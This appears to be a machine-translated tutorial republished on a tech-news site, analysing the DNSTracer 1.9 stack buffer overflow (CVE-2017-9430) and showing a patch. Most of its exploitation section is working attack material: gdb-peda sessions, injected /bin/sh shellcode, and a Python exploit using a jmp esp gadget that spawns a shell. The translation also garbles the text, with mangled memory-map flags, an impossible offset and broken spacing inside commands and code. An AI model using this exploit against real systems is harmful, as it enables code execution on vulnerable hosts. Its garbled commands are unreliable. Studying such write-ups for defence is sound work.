Shulou(Shulou.com)05/31 Report--

This article shows you how to analyze buffer overflow vulnerabilities in DNSTracer 1.9. the content is concise and easy to understand, which will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

Vulnerability description

DNSTracer is an application used to track the process of DNS parsing. A stack buffer overflow vulnerability exists in DNSTracer 1.9 and earlier. An attacker can exploit this vulnerability by using a command line with long arguments to cause a denial of service attack.

Loophole recurrence

Recommended environment remarks operating system Ubuntu 12.04 architecture: 32-bit debugger gdb-peda version number: 7.4 vulnerable software DNSTracer version number: 1.9

First compile and install DNSTracer:

$wget http://www.mavetju.org/download/dnstracer-1.9.tar.gz

$tar zxvf dnstracer-1.9.tar.gz

$cd dnstracer-1.9

$. / confugure

$make & & sudo make install

Pass a very long string as a parameter to trigger the stack overflow:

$dnstracer-v $(python-c 'print "A" * 1025')

* * buffer overflow detected * *: dnstracer terminated

= Backtrace: =

/ lib/i386-linux-gnu/libc.so.6 (+ 0x67377) [0xb757f377]

/ lib/i386-linux-gnu/libc.so.6 (_ _ fortify_fail+0x68) [0xb760f6b8]

/ lib/i386-linux-gnu/libc.so.6 (+ 0xf58a8) [0xb760d8a8]

/ lib/i386-linux-gnu/libc.so.6 (+ 0xf4e9f) [0xb760ce9f]

Dnstracer [0x8048f26]

/ lib/i386-linux-gnu/libc.so.6 (_ _ libc_start_main+0xf7) [0xb7530637]

Dnstracer [0x804920a]

= Memory map: =

08048000-0804e000 r-xp 00000000 08:01 270483 / usr/local/bin/dnstracer

0804f000-08050000 Rmurmurp 00006000 08:01 270483 / usr/local/bin/dnstracer

08050000-08051000 rw-p 00007000 08:01 270483 / usr/local/bin/dnstracer

08051000-08053000 rw-p 00000000 00:00 0

084b6000-084d7000 rw-p 00000000 00:00 0 [heap]

B74e4000-b7500000 r-xp 00000000 08:01 394789 / lib/i386-linux-gnu/libgcc_s.so.1

B7500000-b7501000 rw-p 0001b000 08:01 394789 / lib/i386-linux-gnu/libgcc_s.so.1

B7518000-b76c8000 r-xp 00000000 08:01 394751 / lib/i386-linux-gnu/libc-2.23.so

B76c8000-b76ca000 Rmurmurp 001af000 08:01 394751 / lib/i386-linux-gnu/libc-2.23.so

B76ca000-b76cb000 rw-p 001b1000 08:01 394751 / lib/i386-linux-gnu/libc-2.23.so

B76cb000-b76ce000 rw-p 00000000 00:00 0

B76e4000-b76e7000 rw-p 00000000 00:00 0

B76e7000-b76e9000 Rmurmurp 00000000 00:00 0 [vvar]

B76e9000-b76eb000 r-xp 00000000 00:00 0 [vdso]

B76eb000-b770d000 r-xp 00000000 08:01 394723 / lib/i386-linux-gnu/ld-2.23.so

B770d000-b770e000 rw-p 00000000 00:00 0

B770e000-b770f000 Rmurmurp 00022000 08:01 394723 / lib/i386-linux-gnu/ld-2.23.so

B770f000-b7710000 rw-p 00023000 08:01 394723 / lib/i386-linux-gnu/ld-2.23.so

Bf8e5000-bf907000 rw-p 00000000 00:00 0 [stack]

Vulnerability Analysis of Aborted (core dumped)

This vulnerability is very simple and typical because there is no length check when copying the parameter argv [0] to the array argv0. If it is greater than 1024 bytes, it will cause the stack to overflow:

/ / dnstracer.c

Int

Main (int argc, char * * argv)

{

[...]

Char argv0[ NS_MAXDNAME]

[...]

Strcpy (argv0, argv [0])

/ / dnstracer_broker.h

# ifndef NS_MAXDNAME

# define NS_MAXDNAME 1024

# endif Patch

To fix this vulnerability, add a check on the parameter length before calling strcpy ():

/ * CVE-2017-9430 Fix*/

If (strlen (argv [0]) > = NS_MAXDNAME)

{

Free (server_ip)

Free (server_name)

Fprintf (stderr, "dnstracer: argument is too long% s\ n", argv [0])

Return 1

}

/ / check for a trailing dot

Strcpy (argv0, argv [0]); Exploit

First, modify Makefile, turn off stack protection, and prevent gcc from replacing strcpy () with the security function _ _ strcpy_chk (). Modify the compilation options as follows:

$cat Makefile | grep-w CC

CC = gcc-fno-stack-protector-z execstack-D_FORTIFY_SOURCE=0

COMPILE = $(CC) $(DEFS) $(DEFAULT_INCLUDES) $(INCLUDES) $(AM_CPPFLAGS)\

CCLD = $(CC)

$make & & sudo make install

Gdb-peda$ checksec

CANARY: disabled

FORTIFY: disabled

NX: disabled

PIE: disabled

RELRO: Partial

Finally, turn off ASLR:

# echo 0 > / proc/sys/kernel/randomize_va_space

Because the vulnerability occurs in the main function, the layout of the stack is also a little more complex than in the subfunction. The general process is similar to the previous article on wget overflow vulnerabilities, but that one is a 64-bit program, so I chose to show a 32-bit program here.

Debugging in gdb, using pattern to determine the overflow location, 1060 bytes is sufficient:

Gdb-peda$ pattern_create 1060

Gdb-peda$ pattern_offset $ebp

1849771630 found at offset: 1049

So the return address is at stack offset 104941053.

Gdb-peda$ disassemble main

0x08048df8: mov DWORD PTR [esp+0x4], edi

0x08048dfc: mov DWORD PTR [esp], ebx

0x08048dff: call 0x8048950

0x08048e04: xor eax,eax

0x08048e06: mov ecx,esi

...

0x08048f6e: mov DWORD PTR [esp+0x4], esi

0x08048f72: call 0x804adb0

0x08048f77: mov DWORD PTR [esp], 0xa

Make breakpoints in the following places and adjust our input according to the offset:

Gdb-peda$ b * main+815

Gdb-peda$ b * main+820

Gdb-peda$ b * main+1186

Gdb-peda$ r `perl-e 'print "A" x1053. "BBBB"' `

[--registers--]

EAX: 0x1

EBX: 0xbfffeb3f-- > 0xffed9cb7

ECX: 0x0

EDX: 0xb7fc7180-- > 0x0

ESI: 0xffffffff

EDI: 0xbffff174 ('A'...)

EBP: 0xbfffef58-- > 0x0

ESP: 0xbfffe6d0-- > 0xbfffeb3f-- > 0xffed9cb7

EIP: 0x8048dff (: call 0x8048950)

EFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)

[--code--]

0x8048df1: lea ebx, [esp+0x46f]

0x8048df8: mov DWORD PTR [esp+0x4], edi

0x8048dfc: mov DWORD PTR [esp], ebx

= > 0x8048dff: call 0x8048950

0x8048e04: xor eax,eax

0x8048e06: mov ecx,esi

0x8048e08: repnz scas al,BYTE PTR es: [edi]

0x8048e0a: not ecx

Guessed arguments:

Arg [0]: 0xbfffeb3f-- > 0xffed9cb7

Arg [1]: 0xbffff174 ('A'...)

[--stack--]

0000 | 0xbfffe6d0-- > 0xbfffeb3f-- > 0xffed9cb7

0004 | 0xbfffe6d4-- > 0xbffff174 ('A'...)

0008 | 0xbfffe6d8-- > 0x804be37 ("4cCoq:r:S:s:t:v")

0012 | 0xbfffe6dc-- > 0x0

0016 | 0xbfffe6e0-- > 0x0

0020 | 0xbfffe6e4-- > 0x0

0024 | 0xbfffe6e8-- > 0x0

0028 | 0xbfffe6ec-- > 0x0

[-]

Legend: code, data, rodata, value

Breakpoint 1, 0x08048dff in main (argc=, argv=) at dnstracer.c:1622

1622 strcpy (argv0, argv [0])

Gdb-peda$ x/10wx argv0

0xbfffeb3f: 0xffed9cb7 0x000000bf 0x00000100 0x00000200

0xbfffeb4f: 0xe33b9700 0xfdcac0b7 0x000000b7 0xffeff400

0xbfffeb5f: 0xe24e08b7 0x000001b7

So the stack is in 0xbfffeb3f, and execute this line of code to copy the "A" string at 0xbffff174 into the argv0 array:

Gdb-peda$ c

Continuing.

[--registers--]

EAX: 0xbfffe6bf ('A'...)

EBX: 0xbfffe6bf ('A'...)

ECX: 0xbffff1d0 ("BBBB")

EDX: 0xbfffeadc ("BBBB")

ESI: 0x0

EDI: 0xbfffedb3 ('A'...)

EBP: 0xbfffead8 ("AAAABBBB")

ESP: 0xbfffe290-- > 0xbfffe6bf ('A'...)

EIP: 0x8048dba (: mov ecx,DWORD PTR [ebp-0x82c])

EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)

[--code--]

0x8048db3: push edi

0x8048db4: push ebx

0x8048db5: call 0x8048920

= > 0x8048dba: mov ecx,DWORD PTR [ebp-0x82c]

0x8048dc0: xor eax,eax

0x8048dc2: add esp,0x10

0x8048dc5: repnz scas al,BYTE PTR es: [edi]

0x8048dc7: not ecx

[--stack--]

0000 | 0xbfffe290-- > 0xbfffe6bf ('A'...)

0004 | 0xbfffe294-- > 0xbfffedb3 ('A'...)

0008 | 0xbfffe298-- > 0xffffffff

0012 | 0xbfffe29c-- > 0xffffffff

0016 | 0xbfffe2a0-- > 0x0

0020 | 0xbfffe2a4-- > 0x0

0024 | 0xbfffe2a8-- > 0x8051018 ("127.0.1.1")

0028 | 0xbfffe2ac-- > 0xffffffff

[-]

Legend: code, data, rodata, value

Breakpoint 2, main (argc=, argv=) at dnstracer.c:1623

1623 if (argv0 [strlen (argv [0])-1] ='.') Argv0 [strlen (argv [0])-1] = 0

Gdb-peda$ x/10wx argv0

0xbfffeb3f: 0x41414141 0x41414141 0x41414141 0x41414141

0xbfffeb4f: 0x41414141 0x41414141 0x41414141 0x41414141

0xbfffeb5f: 0x41414141 0x41414141

Gdb-peda$ x/5wx argv0+1053-0x10

0xbfffef4c: 0x41414141 0x41414141 0x41414141 0x41414141

0xbfffef5c: 0x42424242

At the same time the string "BBBB" overrides the return address. So we replace "BBBB" with the stack address 0xbfffeb3f:

Gdb-peda$ r `perl-e 'print "A" x1053. "\ x3f\ xeb\ xff\ xbf"' `

Gdb-peda$ x/5wx argv0+1053-0x10

0xbfffef4c: 0x41414141 0x41414141 0x41414141 0x41414141 0x0

0012 | 0xbfffef60-- > 0x0

0016 | 0xbfffef64-- > 0xbfffeff4-- > 0xbffff15b ("/ usr/local/bin/dnstracer")

0020 | 0xbfffef68-- > 0xbffff000-- > 0xbffff596 ("SSH_AGENT_PID=1407")

0024 | 0xbfffef6c-- > 0xb7fdc858-- > 0xb7e21000-- > 0x464c457f

0028 | 0xbfffef70-- > 0x0

[-]

Legend: code, data, rodata, value

Stopped reason: SIGSEGV

0xbfffef55 in? ()

The error occurs in 0xbfffef55, while shellcode is located in 0xbfffef45, with a difference of 16 bytes:

Gdb-peda$ x/8wx 0xbfffef45

0xbfffef45: 0x6850c031 0x68732f2f 0x69622f68 0x2fe3896e

0xbfffef55: 0x2f6e6962 0x0068732f 0x00000000 0xf4000000

So the solution here is to remove the previous 16 nop and add them after the shellcode.

Gdb-peda$ r `perl-e'print "\ x90" x1014. "\ x31\ xc0\ x50\ x68\ x2f\ x73\ x68\ x68\ x62\ x69\ x6e\ x89\ xe3\ x50\ x53\ x89\ xe1\ xb0\ x0b\ xcd\ x80". "\ x90" x16. "\ X3f\ xeb\ xff\ xbf"'`

Successfully obtained shell.

Gdb-peda$ c

127.0.0.1 (127.0.0.1) *

Process 7161 is executing new program: / bin/dash

$id

[New process 7165]

Process 7165 is executing new program: / usr/bin/id

Uid=1000 (firmy) gid=1000 (firmy) groups=1000 (firmy), 4 (adm), 24 (cdrom), 27 (sudo), 30 (dip), 46 (plugdev), 109 (lpadmin), 124 (sambashare)

$[Inferior 2 (process 7165) exited normally]

Warning: not running or target is remote

What if we turn on ASLR? a common method is to overwrite the return address with the instruction jmp esp, which will make the program continue to execute at the return address, thus executing the shellcode that follows. Using objdump, you can find instructions like this:

$objdump-M intel-D / usr/local/bin/dnstracer | grep jmp | grep esp

804cc5f: ff e4 jmp esp

Exp is as follows:

Import os

From subprocess import call

Def exp ():

Filling = "A" * 1053

Jmp_esp = "\ x5f\ xcc\ x04\ x08"

Shellcode = "\ x31\ xc0\ x50\ x68\ x2f\ x73\ x68\ x68\ x62\ x69\ x6e\ x89\ xe3\ x50\ x53\ x89\ xe1\ xb0\ X0b\ xcd\ x80"

Payload = filling + jmp_esp + shellcode

Call (["dnstracer", payload])

If _ _ name__ = ='_ _ main__':

Try:

Exp ()

Except Exception as e:

Print "Something went wrong"

Bingo!!!

$python exp.py

Tracing to AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA_ / 1 / 2 / Ph//shh/bin / PS / 1 / 2 / 1 / 2 / 1 / 3 / 1 / 3 / 1 / 3 / 1 / 3 / 1 / 1 / 3 / 1 / 1 / 1 / 1 / 1 / 3 / 1 / 1 / 1 / 1 / 3 / 1 / 1 / 1 / 1 / 1 / 1 / 1 / 1 / 1 / 3 / 1 / 1 / 1 / 1 / 1 / 1 / 1 / 1 / 1 / 1 / 1 / 1 / 1 / 1 / 3, 1, 1, 1, 1, 1, 3, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 6, 4, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6,

[a] via 127.0.0.1, maximum of 3 retries

127.0.0.1 (127.0.0.1) *

$id

Uid=1000 (firmy) gid=1000 (firmy) groups=1000 (firmy), 4 (adm), 24 (cdrom), 27 (sudo), 30 (dip), 46 (plugdev), 109 (lpadmin), 124 (sambashare) the above is how to analyze DNSTracer 1.9 buffer overflow vulnerabilities. Have you learned any knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.